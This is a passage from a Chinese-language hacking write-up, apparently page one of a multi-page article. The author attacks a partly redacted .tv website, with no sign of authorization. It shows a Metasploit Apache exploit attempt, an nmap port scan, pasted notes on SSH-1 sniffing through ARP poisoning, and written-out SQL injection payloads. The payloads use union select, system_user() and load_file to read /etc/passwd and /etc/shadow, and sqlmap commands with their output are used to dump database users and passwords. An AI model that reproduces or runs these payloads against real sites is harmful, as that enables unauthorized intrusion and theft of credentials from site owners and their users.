21:03:00 - Initialized the Metasploit Framework GUI.
21:03:29 - apache-mod-rewrite [*] Launching exploit windows/http/apache-mod-rewrite...
21:03:30 - apache-mod-rewrite [*] Started bind handler
21:03:31 - apache-mod-rewrite [*] Trying ...
然后就一直trying........trying....没反应了...tcp 4444也连不上 囧:)
看来管理员还不是很傻哦.
那么先继续探测吧..不能指望直接root他...俺可不是某牛...
端口扫描:
knell@Knell-SuckEr:~$ nmap -v -sT www.xxxxx.tv
Starting Nmap 4.53 ( http://insecure.org ) at 2008-03-03 22:55 CST
Initiating Ping Scan at 22:55
Scanning 66.230.xxx.xxx [1 port]
Completed Ping Scan at 22:55, 0.42s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 22:55
Completed Parallel DNS resolution of 1 host. at 22:55, 0.87s elapsed
Initiating Connect Scan at 22:55
Scanning 66.230.xxx.xxx [1714 ports]
Discovered open port 22/tcp on 66.230.xxx.xxx
Discovered open port 80/tcp on 66.230.xxx.xxx
Discovered open port 21/tcp on 66.230.xxx.xxx
Discovered open port 25/tcp on 66.230.xxx.xxx
Discovered open port 111/tcp on 66.230.xxx.xxx
Discovered open port 3306/tcp on 66.230.xxx.xxx
恩,22当然是ssh咯,banner是SSH-1.99-OpenSSH_3.6.1p2,恩,1.99,有什么利用价值吗?
不废话了,大家直接看cain官网吧:)
Cain & Abel v2.5 beta21 for NT/2000/XP released
New features:
- RSA SecurID Tokens Calculator
The calculator produces valid tokens given the serial number and the activation key of an RSA SecurID device. These parameters are found in Token's activation files typically named "something.ASC".
- SSH-1 sniffer for APR
The sniffer works in in FULL-DUPLEX-MODE decrypting both Client and Server SSH-1 traffic.
It uses APR (Arp Poison Routing) so the attacker's IP and MAC addresses can be totally spoofed and never exposed on the network. APR and a Man-in-the-Middle situation is also required because of the RSA asymmetric encryption used in SSH-1 negotiation's phase. The sniffer supports 3 symmetric encryption algorithms: DES, 3DES and Blowfish. Zlib compression is not supported in this version. The sniffer cannot decrypt SSH-1 traffic if directed to/from the attacker's workstation. Automatic downgrade SSH-2 connections to SSH-1 if server version is v1.99. An example of the output file produced from an SSH-1 session to a Cisco PIX firewall in my test environment is available here.
3306,Mysql是没错了...banner是4.1.7-standard,貌似好多local overflow ,可惜都在地下流传着...
21,ftp banner是220 ProFTPD 1.2.10 Server。Google了一圈,有几个公开的exp,可都测试或者编译失败...这里就不浪费篇幅啦。(要是直接远程root了...那文章就无聊了..)
服务器信息先探测到这里,下面回到web上。
既然服务器是LAMP,那么当然要尝试下sql injection咯。
请出google ,site:xxxxx.tv inurl:php 结果只有一个....
www4.xxxxxxx.tv/rss/rss_videolist.php?type=rss&no=10
而且已经打不开了。
那么 inurl:html,挨个参数用and 1=1 and 1=2,or 1=1 ,or 1=2测试,n久后,找到一个:)比较明显:)
/us/faq.html?faqid=6
and 1=1,and 1=2测试,存在注入,不过还不确定有过滤或者IDS之类,提交单引号,返回了好东西:
warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/g3dezien/xxxxx.tv/public_html/jp/libs2.php on line 638
哈哈,路径出来了!!如果一切顺利...直接outfile个webshell...不过貌似想的太美了...停止YY..继续测试
这里注意到查询是在libs2.php,而不是faq.html,看来是封装了。
接着先手工测试下
判断字段:
faq.html?faqid=1/**/and/**/1=1/**/union/**/select/**/1,2,3,4,5,6,7,8,9/*
9个字段返回了正常,既然支持union,那么找可见的字段直接输出查询内容就好了:)
下面先看下权限:
us/faq.html?faqid=1%20and%201=2%20union%20select%201,2,3,4,system_user(),6,7,8,9%20/*%20and%201=1
在第5个字段返回了:
root@localhost
竟然是...............root........难道真的要准备直接写文件了..?
不是吧..直接就是root?试下暴出etc/passwd:
faqid=1/**/and/**/1=2/**/union/**/select/**/1,2,3,4,load_file(char(47,101,116,99,47,112,97,115,115,119,100)),6,7,8,9/*
返回:
哈哈,还真是暴出来咯...接着当然是shadow....
faqid=1/**/and/**/1=2/**/union/**/select/**/1,2,3,4,load_file(char(47,101,116,99,47,115,104,97,100,111,119)),6,7,8,9/*
返回空白.....
这下暴不出来咯
看来在系统里是nobody...就好像在MM面前俺很潇洒,在真真面前老老实实滴:)
接下来杂办呢?
写文件?!
magic_quotes_gpc=on...我竟然把该死的gpc给忘了....写不了文件,又是nobody,还能干什么吗?先用工具跑下表段,数据库信息。
knell@Knell-SuckEr:~/sqlmap$ sudo ./sqlmap.py -u "http://www.xxxxx.tv/us/faq.html?faqid=1" -v 1 --string "ball_arrow" --users --passwords (这个工具知道的人不多...讲下参数,-u当然是url了,-v是显示等级,1是显示所有细节。 --string就是true page的特征字符串 --users --passwords是mysql.user里的列名)
[sudo] password for knell:
sqlmap/0.5 coded by inquis
and belch
[*] starting at: 20:42:35
[20:42:39] [INFO] testing if GET parameter 'faqid' is dynamic
[20:42:41] [INFO] confirming that GET parameter 'faqid' is dynamic
[20:42:47] [INFO] GET parameter 'faqid' is dynamic
[20:42:47] [INFO] testing sql injection on GET parameter 'faqid'
[20:42:47] [INFO] testing numeric/unescaped injection on GET parameter 'faqid'
[20:42:54] [INFO] confirming numeric/unescaped injection on GET parameter 'faqid'
[20:42:57] [INFO] GET parameter 'faqid' is numeric/unescaped injectable
[20:42:57] [INFO] testing MySQL
[20:42:57] [INFO] query: CONCAT('2', '2')
[20:42:57] [INFO] retrieved: 22
[20:44:10] [INFO] performed 20 queries in 73 seconds
[20:44:10] [INFO] confirming MySQL
[20:44:10] [INFO] query: LENGTH('2')
[20:44:10] [INFO] retrieved: 1
[20:44:52] [INFO] performed 13 queries in 41 seconds
[20:44:52] [INFO] query: SELECT 2 FROM information_schema.TABLES LIMIT 0, 1
[20:44:52] [INFO] retrieved:
[20:45:10] [INFO] performed 6 queries in 17 seconds
remote DBMS: MySQL knell@Knell-SuckEr:~/sqlmap$ sudo ./sqlmap.py -u "http://www.xxxxx.tv/us/faq.html?faqid=1" -v 1 --string "ball_arrow" --tables[/color]
sqlmap/0.5 coded by inquis
and belch
[*] starting at: 22:36:50
[22:36:53] [INFO] testing if GET parameter 'faqid' is dynamic
[22:36:56] [INFO] confirming that GET parameter 'faqid' is dynamic
[22:37:00] [INFO] GET parameter 'faqid' is dynamic
[22:37:00] [INFO] testing sql injection on GET parameter 'faqid'
[22:37:00] [INFO] testing numeric/unescaped injection on GET parameter 'faqid'
[22:37:05] [INFO] confirming numeric/unescaped injection on GET parameter 'faqid'
[22:37:08] [INFO] GET parameter 'faqid' is numeric/unescaped injectable
[22:37:08] [INFO] testing MySQL
[22:37:08] [INFO] query: CONCAT('2', '2')
[22:37:08] [INFO] retrieved: 22
[22:37:57] [INFO] performed 20 queries in 49 seconds
[22:37:57] [INFO] confirming MySQL
[22:37:57] [INFO] query: LENGTH('2')
[22:37:57] [INFO] retrieved: 1
[22:38:29] [INFO] performed 13 queries in 32 seconds
[22:38:29] [INFO] query: SELECT 2 FROM information_schema.TABLES LIMIT 0, 1
[22:38:29] [INFO] retrieved:
[22:38:44] [INFO] performed 6 queries in 14 seconds
上一页 1 2 3 4 下一页 |
安全中国首页 > 文章中心 > 渗透技术